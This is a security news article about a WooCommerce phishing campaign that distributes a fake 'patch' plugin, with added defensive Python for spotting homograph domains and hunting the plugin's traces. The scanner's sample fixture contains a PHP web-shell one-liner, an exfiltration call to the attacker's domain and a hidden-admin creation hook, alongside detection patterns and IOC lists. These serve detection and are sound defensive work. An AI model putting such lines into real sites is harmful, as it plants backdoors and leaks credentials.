Aman Mishra (GBHackers) reports on a recent phishing campaign targeting WooCommerce users, uncovered by the Patchstack security team. The attackers are using cleverly disguised emails to trick website owners into installing malicious software under the pretense of fixing a non-existent vulnerability.
A New Twist on an Old Trick
This scam falsely warns users about a made-up issue called “Unauthenticated Administrative Access” and urges them to download a “patch” from a fake website. The phishing emails look very official, mimicking real WooCommerce alerts. The domain used—woocommėrce[.]com—features a subtle character swap (notice the “ė” instead of “e”), a classic IDN homograph attack meant to deceive even careful readers.
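The homograph check described above can be automated on the link target before anyone clicks. The following is an added example, not code from the GBHackers article or from Patchstack: it converts the host to the IDNA/punycode form a resolver actually sees, folds away the diacritic so `woocommėrce.com` collapses to `woocommerce.com`, and compares that against an allowlist. The allowlist and brand names are assumptions for the example.

```python
import unicodedata

# Assumed allowlist and brand names for the example; substitute your own.
TRUSTED_DOMAINS = {"woocommerce.com", "wordpress.org"}
TRUSTED_BRANDS = ("woocommerce", "wordpress")


def to_punycode(domain):
    """IDNA ToASCII: the form a resolver sees (non-ASCII labels become xn--...)."""
    return domain.encode("idna").decode("ascii")


def skeleton(domain):
    """Fold a domain to its plain-ASCII lookalike: case-fold, NFKD-decompose,
    drop combining marks (so 'ė' -> 'e' + U+0307 -> 'e'), then drop the rest."""
    decomposed = unicodedata.normalize("NFKD", domain.casefold())
    no_marks = "".join(c for c in decomposed if not unicodedata.combining(c))
    return no_marks.encode("ascii", "ignore").decode("ascii")


def check_link_domain(domain):
    """Classify the host of a link taken from an email. Returns (verdict, detail)."""
    folded = domain.casefold().rstrip(".")
    if folded in TRUSTED_DOMAINS:
        return "trusted", folded
    ascii_form = to_punycode(folded)
    look = skeleton(folded)
    is_idn = any(label.startswith("xn--") for label in ascii_form.split("."))
    if is_idn and look in TRUSTED_DOMAINS:
        # Renders like a trusted domain but resolves somewhere else entirely.
        return "homograph", f"{ascii_form} renders as {domain} and imitates {look}"
    if any(brand in look for brand in TRUSTED_BRANDS):
        # Plain-ASCII brand squatting, e.g. woocommerce-services.com.
        return "lookalike", f"{ascii_form} contains a trusted brand name"
    return ("idn" if is_idn else "unknown"), ascii_form


if __name__ == "__main__":
    for host in ("woocommerce.com", "woocommėrce.com",
                 "woocommerce-services.com", "example.com"):
        print(host, check_link_domain(host))
```

The NFKD fold catches diacritic swaps like `ė` for `e`; it does not catch cross-script homoglyphs such as Cyrillic `е` (U+0435), which need a confusables table (Unicode TS #39) rather than normalization. Either way, the punycode form is what to put in a block list or a mail-gateway rule, because that is the string that is actually resolved.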
According to Aman Mishra, this tactic is eerily similar to past “Fake CVE” attacks seen in the WordPress ecosystem, suggesting the same group might be behind it or at least using similar playbooks.
The Attack in Action
Victims who click the “Download Patch” button are taken to a fake WooCommerce Marketplace site. There, they’re prompted to install a ZIP file called authbypass-update-31297-id.zip. Once installed as a plugin, the file hides its activity by using legitimate WordPress functions.
Here’s how it works:
- It registers a WP-Cron job (with names like mergeCreator655) that creates a hidden administrator account.
- Sends the credentials and site URL, base64-encoded, to woocommerce-services[.]com/wpapi.
- Installs web shells like P.A.S.-Fork, p0wny, and WSO from other malicious domains.
- Hides itself from the plugin list and masks the rogue admin account to avoid detection.
This gives the attackers full control over the site. They can:
- Inject unwanted ads
- Steal billing data
- Redirect users to scam sites
- Launch DDoS attacks
- Or even hold your site ransom by encrypting data
Only Dangerous If You Fall for It
As emphasized by Aman Mishra, this threat only becomes real if someone installs the fake plugin. Neither WordPress nor WooCommerce will ever ask you to manually download and install updates. All legitimate patches are handled through the built-in update system.
Look out for these Indicators of Compromise:
- A strange admin username made of random characters (e.g., jd3hr91z)
- Unknown cronjob names in your WP Cron
- Suspicious folders in wp-content/plugins or wp-content/uploads
- Outgoing traffic to malicious domains like woocommerce-api[.]com
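The plugin behaviour described under "The Attack in Action" and the indicators listed above can be turned into a hunt script. The following is an added example, not code from the article or from Patchstack: it walks a WordPress tree for PHP under `wp-content/uploads`, for the web-shell names and the hiding hooks the article describes, for files that both schedule a cron event and create a user, and for the named domains; it also flags random-looking administrator logins and cron hooks outside an allowlist. The allowlists, the login pattern and the sample install it builds in a temp directory are constructed assumptions for the example, not real captures.

```python
import re
import tempfile
from pathlib import Path

# Hosts named in the article as exfiltration / download domains. Assumed to be
# the full list only for this example; extend from your own intel.
IOC_DOMAINS = ["woocommerce-services.com", "woocommerce-api.com"]

# Heuristic source markers. Web-shell names come from the article; the hook
# names are the standard WordPress filters a plugin would use to drop itself
# from the plugin list (all_plugins) or a user from the users table
# (pre_user_query, views_users). Legitimate plugins rarely hook these.
SOURCE_MARKERS = {
    "webshell-name": re.compile(r"P\.A\.S\.|p0wny|\bWSO\b"),
    "eval-obfuscation": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "hides-plugin": re.compile(r"add_filter\s*\(\s*['\"]all_plugins['\"]"),
    "hides-user": re.compile(r"['\"](?:pre_user_query|views_users)['\"]"),
    "ioc-domain": re.compile("|".join(re.escape(d) for d in IOC_DOMAINS), re.I),
}
# Scheduling a cron event and creating a user in one file is the exact
# combination the report describes.
CRON_RE = re.compile(r"wp_schedule_(?:single_)?event\s*\(")
USER_CREATE_RE = re.compile(r"wp_(?:create|insert)_user\s*\(")

# Core cron hooks plus prefixes of well-known schedulers (assumed allowlist;
# add your own plugins' hooks only after reading their source).
CORE_CRON_HOOKS = {
    "wp_version_check", "wp_update_plugins", "wp_update_themes",
    "wp_scheduled_delete", "delete_expired_transients",
    "wp_scheduled_auto_draft_delete", "recovery_mode_clean_expired_keys",
    "wp_site_health_scheduled_check", "wp_privacy_delete_old_export_files",
    "wp_update_user_counts",
}
ALLOWED_CRON_PREFIXES = ("woocommerce_", "wc_", "action_scheduler_")

# Rogue logins in the report look like jd3hr91z: lowercase letters and digits
# only, at least two digits and three letters. Heuristic; tune for your users.
RANDOM_LOGIN_RE = re.compile(r"^(?=(?:[a-z]*\d){2})(?=(?:\d*[a-z]){3})[a-z0-9]{6,12}$")


def scan_tree(wp_root):
    """Walk a WordPress install; return {relative_path: sorted finding names}."""
    root = Path(wp_root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        hits = set()
        if rel.startswith("wp-content/uploads/"):
            hits.add("php-in-uploads")  # WordPress never writes code there
        text = path.read_text(errors="ignore")
        hits.update(n for n, rx in SOURCE_MARKERS.items() if rx.search(text))
        if CRON_RE.search(text) and USER_CREATE_RE.search(text):
            hits.add("cron-creates-user")
        if hits:
            findings[rel] = sorted(hits)
    return findings


def suspicious_admins(users):
    """users: [{'login': ..., 'roles': [...]}], e.g. from `wp user list --format=json`."""
    return [u["login"] for u in users
            if "administrator" in u["roles"] and RANDOM_LOGIN_RE.match(u["login"])]


def unknown_cron_hooks(hooks):
    """hooks: hook names, e.g. from `wp cron event list --format=json`."""
    return [h for h in hooks
            if h not in CORE_CRON_HOOKS and not h.startswith(ALLOWED_CRON_PREFIXES)]


def build_sample_tree():
    """Constructed sample install (not a real capture) for a dry run."""
    root = Path(tempfile.mkdtemp(prefix="wp-hunt-"))
    files = {
        # benign plugin: schedules a cron job but never creates a user
        "wp-content/plugins/good-plugin/good-plugin.php":
            "<?php\nwp_schedule_event(time(), 'daily', 'good_plugin_cleanup');\n",
        # rogue 'patch' plugin with the behaviours the article describes
        "wp-content/plugins/authbypass-update/authbypass-update.php":
            "<?php\nadd_filter('all_plugins', 'ab_hide_plugin');\n"
            "add_action('pre_user_query', 'ab_hide_user');\n"
            "wp_schedule_single_event(time() + 60, 'mergeCreator655');\n"
            "function ab_make() { wp_create_user('jd3hr91z', $pw, 'x@example.invalid'); }\n"
            "wp_remote_post('https://woocommerce-services.com/wpapi', $args);\n",
        # web shell dropped under uploads/
        "wp-content/uploads/2025/04/shell.php":
            "<?php /* WSO */ eval(base64_decode($_POST['c'])); ?>\n",
    }
    for rel, body in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    return root


if __name__ == "__main__":
    for rel, hits in scan_tree(build_sample_tree()).items():
        print(rel, hits)
```

Run `scan_tree` against the real document root and feed `suspicious_admins` and `unknown_cron_hooks` from WP-CLI JSON output rather than from the admin UI, since the plugin filters the plugin list and the users table that the UI shows; the database and the filesystem do not lie in the same way. Treat every hit as a lead to read the file, not as a verdict.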
Stay Safe and Smart
Cybersecurity expert Aman Mishra advises WooCommerce users to stay alert. Double-check any urgent email alerts. Always verify update requests through official WooCommerce or WordPress dashboards—never through third-party links in emails.
As attackers evolve, so should your defense. Share this article with other website owners and help them stay one step ahead.